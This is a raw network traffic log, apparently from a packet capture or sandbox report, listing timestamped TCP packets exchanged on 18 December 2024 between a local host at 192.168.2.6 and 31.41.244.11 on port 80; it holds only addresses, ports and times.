                                                                                                                                                              Dec 18, 2024 11:47:48.685909033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.685939074 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.685959101 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.687091112 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.687103033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.687134981 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.687146902 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.688405991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.688419104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.688450098 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.688465118 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.689500093 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.689513922 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.689537048 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.689553976 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.690610886 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.690648079 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.691015005 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.691049099 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.691828966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.691842079 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.691869020 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.691879034 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.692903996 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.692945004 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.694063902 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.694102049 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.694114923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.694149971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.695353985 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.695367098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.695415020 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.695415020 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.696410894 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.696449995 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.696715117 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.696751118 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.697973967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.697985888 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.698025942 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.698883057 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.698898077 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.698910952 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.698928118 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.698957920 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.700048923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.700089931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.700432062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.700469017 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.701479912 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.701492071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.701524973 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.702584028 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.702596903 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.702621937 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.702644110 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.703689098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.703701973 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.703728914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.703737974 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.704782009 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.704796076 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.704823017 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.704834938 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.705902100 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.705914021 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.705944061 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.705960035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.706943989 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.706957102 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.706979990 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.706995964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.708234072 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.708247900 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.708278894 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.708297014 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.709417105 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.709431887 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.709460020 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.709474087 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.711175919 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.711188078 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.711237907 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.712095976 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.712107897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.712135077 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.712152004 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.712852955 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.712893009 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.713164091 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.713210106 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.714204073 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.714226961 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.714241982 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.714261055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.716377020 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.716407061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.716430902 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.716464996 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.716686010 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.716711998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.716731071 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.716742992 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.718041897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.718067884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.718084097 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.718101978 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.719008923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.719033003 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.719049931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.719070911 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.720005989 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.720029116 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.720048904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.720068932 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.721582890 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.721606016 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.721622944 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.721648932 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.722369909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.722393990 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.722417116 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.722438097 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.723680019 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.723711014 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.723721981 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.723751068 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.724793911 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.724818945 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.724842072 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.724860907 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.725882053 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.725905895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.725925922 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.725940943 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.727720022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.727746964 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.727776051 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.727809906 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.728070974 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.728106976 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.728487015 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.728528976 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.729123116 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.729163885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.862793922 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.862819910 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.862845898 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.862879038 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.865601063 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.865617037 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.865652084 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.865686893 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.866074085 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.866111040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.866147995 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.866178036 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.866278887 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.866295099 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.866313934 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.866328001 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.866889954 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.866904020 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.866936922 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.866952896 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.867450953 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.867468119 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.867487907 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.867516041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.867867947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.867882013 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.867907047 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.867923021 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.868447065 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.868463039 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.868484020 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.868501902 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.869508982 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.869530916 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.869549036 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.869574070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.870213032 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.870249987 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.870651007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.870687962 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.871759892 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.871783972 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.871813059 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.871831894 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.872677088 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.872729063 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.872750044 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.872796059 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.873866081 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.873888969 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.873912096 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.873927116 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.875114918 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.875132084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.875161886 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.875196934 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.879585028 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.879609108 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.879626989 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.879652023 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.879990101 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.880012989 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.880033016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.880049944 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.880115986 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.880131006 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.880148888 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.880167007 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.880702972 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.880718946 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.880739927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.880764008 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.881047964 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.881087065 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.881818056 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.881850958 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.882371902 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.882417917 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.882884026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.882930994 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.883920908 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.883938074 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.883968115 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.883985996 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.884953022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.884964943 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.884993076 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.885008097 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.885739088 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.885751963 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.885776043 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.885799885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.886651039 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.886665106 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.886693001 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.886709929 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.888227940 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.888240099 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.888279915 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.888299942 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.889085054 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.889096022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.889122963 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.889137030 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.890275002 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.890286922 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.890311956 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.890336990 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.891592026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.891603947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.891633034 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.891665936 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.893536091 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.893548012 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.893590927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.894733906 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.894746065 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.894774914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.894793987 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.895241022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.895257950 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.895283937 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.895319939 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.895997047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.896008968 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.896056890 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.897125959 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.897166967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.897176027 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.897202015 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.898653030 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.898713112 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.898735046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.898804903 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.899631023 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.899646044 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.899667978 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.899686098 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.900777102 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.900819063 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.900837898 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.900907040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.901859999 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.901907921 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.902718067 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.902775049 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.903476000 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.903489113 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.903513908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.903539896 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.904160023 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.904175043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.904197931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.904220104 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.905582905 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.905601025 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.905628920 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.905647993 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.906560898 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.906573057 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.906599998 CET4987880192.168.2.631.41.244.11
